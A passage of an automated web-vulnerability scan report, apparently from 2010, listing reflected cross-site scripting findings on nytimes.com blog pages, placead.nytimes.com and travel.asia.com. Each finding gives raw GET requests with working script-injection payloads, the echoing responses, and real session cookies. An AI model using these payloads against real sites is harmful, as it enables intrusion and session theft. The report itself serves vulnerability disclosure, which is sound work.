X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:34:42 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43676

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/tag/alan-simpson6c449\"><script>alert(1)</script>aa03640b195&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.251. http://opinionator.blogs.nytimes.com/tag/budget/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /tag/budget/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2cba"><script>alert(1)</script>07b5f6d156f was submitted in the REST URL parameter 2. This input was echoed as b2cba\"><script>alert(1)</script>07b5f6d156f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/budgetb2cba"><script>alert(1)</script>07b5f6d156f/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:34:41 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:34:41 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43610

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/tag/budgetb2cba\"><script>alert(1)</script>07b5f6d156f&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.252. http://opinionator.blogs.nytimes.com/tag/erskine-bowles/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /tag/erskine-bowles/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46da7"><script>alert(1)</script>1e63690772d was submitted in the REST URL parameter 2. This input was echoed as 46da7\"><script>alert(1)</script>1e63690772d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/erskine-bowles46da7"><script>alert(1)</script>1e63690772d/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:35:12 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:35:12 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43698

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/tag/erskine-bowles46da7\"><script>alert(1)</script>1e63690772d&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.253. http://opinionator.blogs.nytimes.com/tag/federal-deficit/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /tag/federal-deficit/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e27d9"><script>alert(1)</script>9f7b01c18fc was submitted in the REST URL parameter 2. This input was echoed as e27d9\"><script>alert(1)</script>9f7b01c18fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/federal-deficite27d9"><script>alert(1)</script>9f7b01c18fc/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:35:03 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:35:03 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/tag/federal-deficite27d9\"><script>alert(1)</script>9f7b01c18fc&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.254. http://opinionator.blogs.nytimes.com/tag/health-care-reform/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /tag/health-care-reform/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5372b"><script>alert(1)</script>38c18077a9b was submitted in the REST URL parameter 2. This input was echoed as 5372b\"><script>alert(1)</script>38c18077a9b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/health-care-reform5372b"><script>alert(1)</script>38c18077a9b/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:35:52 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:35:52 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43742

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/tag/health-care-reform5372b\"><script>alert(1)</script>38c18077a9b&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.255. http://opinionator.blogs.nytimes.com/tag/social-security/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /tag/social-security/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbbda"><script>alert(1)</script>3f6532f4d66 was submitted in the REST URL parameter 2. This input was echoed as bbbda\"><script>alert(1)</script>3f6532f4d66 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/social-securitybbbda"><script>alert(1)</script>3f6532f4d66/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:34:05 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:34:05 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/tag/social-securitybbbda\"><script>alert(1)</script>3f6532f4d66&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.256. http://opinionator.blogs.nytimes.com/tag/taxes/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /tag/taxes/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a055"><script>alert(1)</script>e55dc6ad2dd was submitted in the REST URL parameter 2. This input was echoed as 8a055\"><script>alert(1)</script>e55dc6ad2dd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/taxes8a055"><script>alert(1)</script>e55dc6ad2dd/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:35:57 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:35:57 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43599

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/tag/taxes8a055\"><script>alert(1)</script>e55dc6ad2dd&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.257. https://placead.nytimes.com/default.asp [CategoryID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://placead.nytimes.com
Path:   /default.asp

Issue detail

The value of the CategoryID request parameter is copied into a JavaScript rest-of-line comment. The payload eb5ca%0aalert(1)//b980444a65b was submitted in the CategoryID parameter. This input was echoed as eb5ca
alert(1)//b980444a65b
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /default.asp?CategoryID=NYTCAReb5ca%0aalert(1)//b980444a65b HTTP/1.1
Host: placead.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 13 Nov 2010 02:36:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 24581
Content-Type: text/html
Set-Cookie: ASPSESSIONIDACBCSTDB=FAMDFFPCDIBJNBMJJBLKKHME; path=/
Cache-control: private


<script language="javascript">
alert("The information you have entered is not valid. Please try again.");
history.go(-1);
</script>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
...[SNIP]...
<SCRIPT TYPE="text/javascript">
//-------------------------------------------------------------------------
function Check_Step1()
{
   var chk = "N"
   //if ('NYTCAReb5ca
alert(1)//b980444a65b
' != 'BOSWTS')
   //{
       //document.ListingType.LTypeId.checked = true;
       //return true
   //}

   for (i = 0; i < document.ListingType.LTypeId.length; i ++) {
       if (document.ListingType.LTypeId[i].che
...[SNIP]...

3.258. http://prescriptions.blogs.nytimes.com/2010/11/12/group-says-camel-packs-lure-the-young/ [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://prescriptions.blogs.nytimes.com
Path:   /2010/11/12/group-says-camel-packs-lure-the-young/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b729"><script>alert(1)</script>c6039f40b13 was submitted in the src parameter. This input was echoed as 2b729\"><script>alert(1)</script>c6039f40b13 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/group-says-camel-packs-lure-the-young/?src=twr2b729"><script>alert(1)</script>c6039f40b13 HTTP/1.1
Host: prescriptions.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 02:36:48 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://prescriptions.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 66165

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
ring&keywords=health+care+reform,health+care+costs,insurance,prescription+drugs,hospitals,medicine,health+policy,The+New+York+Times;campaign-for-tobacco-free-kids;marketing;r-j-reynolds;tobacco&src=twr2b729\"><script>alert(1)</script>c6039f40b13">
...[SNIP]...

3.259. http://scientistatwork.blogs.nytimes.com/2010/11/12/drought-in-the-amazon-up-close-and-personal/ [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://scientistatwork.blogs.nytimes.com
Path:   /2010/11/12/drought-in-the-amazon-up-close-and-personal/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc24e"><script>alert(1)</script>92f6252037 was submitted in the src parameter. This input was echoed as fc24e\"><script>alert(1)</script>92f6252037 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/drought-in-the-amazon-up-close-and-personal/?src=twrfc24e"><script>alert(1)</script>92f6252037 HTTP/1.1
Host: scientistatwork.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 02:38:03 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://scientistatwork.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 65709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
ert;New+York+Times;jungle;Madagascar;experiment;South+America;Arctic;scientist;expedition;Antarctica;explore;ecology;chameleon;natural+history;amazon;conservation;field-museum;nigel-pitman;peru&src=twrfc24e\"><script>alert(1)</script>92f6252037">
...[SNIP]...

3.260. http://scientistatwork.blogs.nytimes.com/2010/11/12/in-the-remote-pacific-glimpses-of-pristine-corals/ [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://scientistatwork.blogs.nytimes.com
Path:   /2010/11/12/in-the-remote-pacific-glimpses-of-pristine-corals/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9fef4"><script>alert(1)</script>4150483ac40 was submitted in the src parameter. This input was echoed as 9fef4\"><script>alert(1)</script>4150483ac40 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/in-the-remote-pacific-glimpses-of-pristine-corals/?src=twr9fef4"><script>alert(1)</script>4150483ac40 HTTP/1.1
Host: scientistatwork.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 02:37:57 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://scientistatwork.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61625

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
mes;jungle;Madagascar;experiment;South+America;Arctic;scientist;expedition;Antarctica;explore;ecology;chameleon;natural+history;coral;fish;line-islands;pacific-ocean;palmyra-atoll;stuart-sandin&src=twr9fef4\"><script>alert(1)</script>4150483ac40">
...[SNIP]...

3.261. http://south-korea.travel.asia.com/cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://south-korea.travel.asia.com
Path:   /cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 73173<a>119de2795e8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cheap-flights-country73173<a>119de2795e8/South-Korea/Search-South-Korea-Discount-Flights-And-Save HTTP/1.1
Host: south-korea.travel.asia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
Last-Modified: Sat, 13 Nov 2010 02:38:15 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 13 Nov 2010 02:38:15 GMT
Date: Sat, 13 Nov 2010 02:38:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 63889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<meta htt
...[SNIP]...
</a> > Cheap Flights Country73173<a>119de2795e8
<h2 class="PostHeaderIcon-wrapper">
...[SNIP]...

3.262. http://south-korea.travel.asia.com/cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://south-korea.travel.asia.com
Path:   /cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f5784'-alert(1)-'530e8a7a41d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cheap-flights-countryf5784'-alert(1)-'530e8a7a41d/South-Korea/Search-South-Korea-Discount-Flights-And-Save HTTP/1.1
Host: south-korea.travel.asia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
Last-Modified: Sat, 13 Nov 2010 02:38:14 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 13 Nov 2010 02:38:14 GMT
Date: Sat, 13 Nov 2010 02:38:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 64150

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<meta htt
...[SNIP]...
t type="text/javascript">

var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-51381-1']);
_gaq.push(['_setDomainName', 'asia.com']);
